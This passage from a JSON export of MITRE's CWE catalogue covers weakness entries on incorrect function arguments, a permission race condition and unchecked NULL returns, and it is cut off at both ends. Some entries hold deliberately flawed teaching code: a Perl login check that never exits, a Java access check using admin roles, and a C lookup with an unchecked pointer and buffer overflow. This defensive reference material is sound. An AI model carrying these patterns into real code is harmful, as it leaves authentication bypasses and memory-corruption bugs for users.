leading to incorrect usage.","Extended_Description":"When providing functionality to an external party, it is important that the software behaves in accordance with the details specified. When requirements of nuances are not documented, the functionality may produce unintended behaviors for the caller, possibly leading to an exploitable state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that your code strictly conforms to specifications."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"PRE09-C","Entry_Name":"Do not replace secure functions with less secure functions"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Provide Specified Functionality","attr":{"@_Date":"2011-03-29"}}}},"685":{"attr":{"@_ID":"685","@_Name":"Function Call With Incorrect Number of Arguments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies too many arguments, or too few arguments, which may lead to undefined behavior and resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem typically occurs when the programmer makes a typo, or copy and paste errors."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":{"Method":"Other","Description":"While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers of arguments, such as format strings in C. It also can occur in languages or environments that do not require that functions always be called with the correct number of arguments, such as Perl."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP37-C","Entry_Name":"Call functions with the correct number and type of arguments","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO47-C","Entry_Name":"Use valid format strings","Mapping_Fit":"Imprecise"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"686":{"attr":{"@_ID":"686","@_Name":"Function Call With Incorrect Argument Type","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies an argument that is the wrong data type, which may lead to resultant weaknesses.","Extended_Description":"This weakness is most likely to occur in loosely typed languages, or in strongly typed languages in which the types of variable arguments cannot be enforced at compilation time, or where there is implicit casting.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP37-C","Entry_Name":"Call functions with the correct number and type of arguments","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO47-C","Entry_Name":"Use valid format strings","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS34-C","Entry_Name":"Do not call putenv() with a pointer to an automatic variable as the argument"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR37-C","Entry_Name":"Arguments to character handling functions must be representable as an unsigned char"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"687":{"attr":{"@_ID":"687","@_Name":"Function Call With Incorrectly Specified Argument Value","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies an argument that contains the wrong value, which may lead to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Static Analysis","Description":"This might require an understanding of intended program behavior or design to determine whether the value is incorrect."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-63"},"Intro_Text":"This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub ReportAuth {}sub PrivilegedFunc{}","xhtml:div":[{"#text":"my ($username, $result, $fatal) = @_;PrintLog(\\"auth: username=%s, result=%d\\", $username, $result);if (($result ne \\"success\\") &amp;&amp; $fatal) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"die \\"Failed!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"my $result = CheckAuth($username);ReportAuth($username, $result, 0);DoReallyImportantStuff();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM04-C","Entry_Name":"Do not perform zero length allocations"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"When primary, this weakness is most likely to occur in rarely-tested code, since the wrong value can change the semantic meaning of the program\'s execution and lead to obviously-incorrect behavior. It can also be resultant from issues in which the program assigns the wrong value to a variable, and that variable is later used in a function call. In that sense, this issue could be argued as having chaining relationships with many implementation errors in CWE.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"688":{"attr":{"@_ID":"688","@_Name":"Function Call With Incorrect Variable or Reference as Argument","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies the wrong variable or reference as one of the arguments, which may lead to undefined behavior and resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem typically occurs when the programmer makes a typo, or copy and paste errors."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":{"Method":"Other","Description":"While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers of arguments, such as format strings in C. It also can occur in loosely typed languages or environments. This might require an understanding of intended program behavior or design to determine whether the value is incorrect."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-64"},"Intro_Text":"In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static final String[] ADMIN_ROLES = ...;public boolean void accessGranted(String resource, String user) {}private boolean void accessGranted(String resource, String[] userRoles) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"String[] userRoles = getUserRoles(user);return accessGranted(resource, ADMIN_ROLES);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// grant or deny access based on user roles"}}]}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-2548","Description":"Kernel code specifies the wrong variable in first argument, leading to resultant NULL pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2548"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"689":{"attr":{"@_ID":"689","@_Name":"Permission Race Condition During Resource Copy","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Draft"},"Description":"The product, while copying or cloning a resource, does not set the resource\'s permissions or access control until the copy is complete, leaving the resource exposed to other spheres while the copy is taking place.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"362","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"732","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":{"xhtml:p":["Common examples occur in file archive extraction, in which the product begins the extraction with insecure default permissions, then only sets the final permissions (as specified in the archive) once the copy is complete. The larger the archive, the larger the timing window for the race condition.","This weakness has also occurred in some operating system utilities that perform copies of deeply nested directories containing a large number of files.","This weakness can occur in any type of functionality that involves copying objects or resources in a multi-user environment, including at the application level. For example, a document management system might allow a user to copy a private document, but if it does not set the new copy to be private as soon as the copy begins, then other users might be able to view the document while the copy is still taking place."]}}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0760","Description":"Archive extractor decompresses files with world-readable permissions, then later sets permissions to what the archive specified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0760"},{"Reference":"CVE-2005-2174","Description":"Product inserts a new object into database before setting the object\'s permissions, introducing a race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2174"},{"Reference":"CVE-2006-5214","Description":"Error file has weak permissions before a chmod is performed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5214"},{"Reference":"CVE-2005-2475","Description":"Archive permissions issue using hard link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2475"},{"Reference":"CVE-2003-0265","Description":"Database product creates files world-writable before initializing the setuid bits, leading to modification of executables.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0265"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"27"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Permission Races&#34;, Page 533"}}},"Notes":{"Note":{"#text":"Under-studied. It seems likely that this weakness could occur in any situation in which a complex or large copy operation occurs, when the resource can be made available to other spheres as soon as it is created, but before its initialization is complete.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"690":{"attr":{"@_ID":"690","@_Name":"Unchecked Return Value to NULL Pointer Dereference","@_Abstraction":"Compound","@_Structure":"Chain","@_Status":"Draft"},"Description":"The product does not check for an error after calling a function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference.","Extended_Description":"While unchecked return value weaknesses are not limited to returns of NULL pointers (see the examples in CWE-252), functions often return NULL to indicate an error status. When this error condition is not checked, a NULL pointer dereference can occur.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"StartsWith","@_CWE_ID":"252","@_View_ID":"709","@_Chain_ID":"690"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"476","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"A typical occurrence of this weakness occurs when an application includes user-controlled input to a malloc() call. The related code might be correct with respect to preventing buffer overflows, but if a large value is provided, the malloc() will fail due to insufficient memory. This problem also frequently occurs when a parsing routine expects that certain elements will always be present. If malformed input is provided, the parser might return NULL. For example, strtok() can return NULL."}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"This typically occurs in rarely-triggered error conditions, reducing the chances of detection during black box testing."},{"Method":"White Box","Description":"Code analysis can require knowledge of API behaviors for library functions that might return NULL, reducing the chances of detection when unknown libraries are used."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The code below makes a call to the getUserName() function but doesn\'t check the return value before dereferencing (which may cause a NullPointerException).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String username = getUserName();if (username.equals(ADMIN_USER)) {}","xhtml:br":"","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1052","Description":"Large Content-Length value leads to NULL pointer dereference when malloc fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1052"},{"Reference":"CVE-2006-6227","Description":"Large message length field leads to NULL pointer dereference when malloc fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6227"},{"Reference":"CVE-2006-2555","Description":"Parsing routine encounters NULL dereference when input is missing a colon separator.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2555"},{"Reference":"CVE-2003-1054","Description":"URI parsing API sets argument to NULL when a parsing failure occurs, such as when the Referer header is missing a hostname, leading to NULL dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1054"},{"Reference":"CVE-2008-5183","Description":"chain: unchecked return value can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP34-C","Entry_Name":"Do not dereference null pointers","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP32-PL","Entry_Name":"Do not ignore function return values","Mapping_Fit":"CWE More Specific"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content 